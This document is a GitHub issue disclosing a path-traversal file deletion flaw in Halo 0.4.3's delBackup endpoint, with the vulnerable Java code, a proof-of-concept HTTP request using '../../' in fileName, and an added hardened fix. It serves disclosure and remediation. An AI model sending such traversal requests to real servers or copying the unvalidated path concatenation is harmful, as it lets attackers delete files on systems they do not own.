
CVE-2020-19038: Arbitrary file deletion in the admin backend · Issue #136 · halo-dev/halo

File Deletion vulnerability in Halo 0.4.3 via delBackup.


I confirm that I have already checked (mark [ ] as [x])

  • The Halo documentation
  • The GitHub Wiki FAQ
  • Other issues

I am requesting (mark [ ] as [x])

  • A bug report
  • A new feature or function
  • Technical support

There is an arbitrary file deletion vulnerability in the backup deletion endpoint (delBackup). The user-controlled type and fileName request parameters are concatenated straight into a filesystem path with no validation, so "../" segments escape the backup directory and any file the Halo process can delete becomes a target.

@GetMapping(value = "delBackup")
@ResponseBody
public JsonResult delBackup(@RequestParam("fileName") String fileName,
                            @RequestParam("type") String type) {
    // Both user-controlled parameters are concatenated directly into the path;
    // neither is checked for path separators or ".." segments.
    final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
    try {
        // Sink: deletes whatever path the concatenation resolved to.
        FileUtil.del(srcPath);
        return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
    } catch (Exception e) {
        return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
    }
}

For example, the following request (sent with an admin session, as the endpoint sits under /admin/) deletes an uploaded image that lives outside the backup directory:

GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO

The vulnerability was discovered by Chaitin Tech.
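The fix is to resolve the two parameters against the backup root and refuse anything that does not stay inside it. The following is an added example, not Halo's own code or its actual patch; it assumes plain java.nio.file with no Spring or Hutool dependency, a backup root under user.home/halo/backup as in the snippet above, and constructed inputs that mirror the request in the issue. It rejects path separators and ".." in either parameter, re-checks the normalized path against the root as a second layer, and deletes only regular files, never directories or symlinks.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;
import java.nio.file.Paths;

public class SafeBackupDelete {

    // Assumed backup root, matching the user.home + "/halo/backup/" layout in the issue.
    private static final Path BACKUP_ROOT =
            Paths.get(System.getProperty("user.home"), "halo", "backup").toAbsolutePath().normalize();

    private static boolean hasTraversalChars(String s) {
        return s == null || s.isEmpty() || s.contains("/") || s.contains("\\") || s.contains("..");
    }

    /** Resolve type/fileName to a path strictly inside BACKUP_ROOT, or throw. */
    static Path resolveBackupPath(String type, String fileName) {
        // Layer 1: a backup type or file name never legitimately contains separators or "..".
        if (hasTraversalChars(type) || hasTraversalChars(fileName)) {
            throw new IllegalArgumentException("invalid backup identifier");
        }
        Path target = BACKUP_ROOT.resolve(type).resolve(fileName).normalize();
        // Layer 2: after normalization the result must still be under the root.
        // Path.startsWith compares whole components, so "/halo/backupx" does not pass.
        if (!target.startsWith(BACKUP_ROOT)) {
            throw new IllegalArgumentException("path escapes backup root");
        }
        return target;
    }

    /** Delete a backup file; returns false if nothing was deleted. */
    static boolean deleteBackup(String type, String fileName) throws IOException {
        Path target = resolveBackupPath(type, fileName);
        // Refuse directories and symlinks so a stray entry cannot redirect the delete.
        if (!Files.isRegularFile(target, LinkOption.NOFOLLOW_LINKS)) {
            return false;
        }
        return Files.deleteIfExists(target);
    }

    public static void main(String[] args) {
        // Constructed inputs: a legitimate name, the traversal from the issue, and a traversal in "type".
        String[][] cases = {
            {"posts", "backup-2019-04-04.zip"},
            {"posts", "../../upload/2019/3/veer-15238236420190404102850332.jpg"},
            {"../../upload", "some.jpg"},
        };
        for (String[] c : cases) {
            try {
                System.out.println("accepted: " + resolveBackupPath(c[0], c[1]));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + c[0] + "/" + c[1] + ": " + e.getMessage());
            }
        }
    }
}
```

Compile with javac and run the class: only the first case is accepted, and it resolves to a path beneath the backup root; both traversal attempts are rejected before any filesystem access. Two further points a reviewer would raise about the original endpoint are independent of path handling: it performs a destructive operation on a GET request, which should be a POST or DELETE so that a browser does not issue it from a crafted link, and it reports success or failure to the caller without logging which path was touched.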
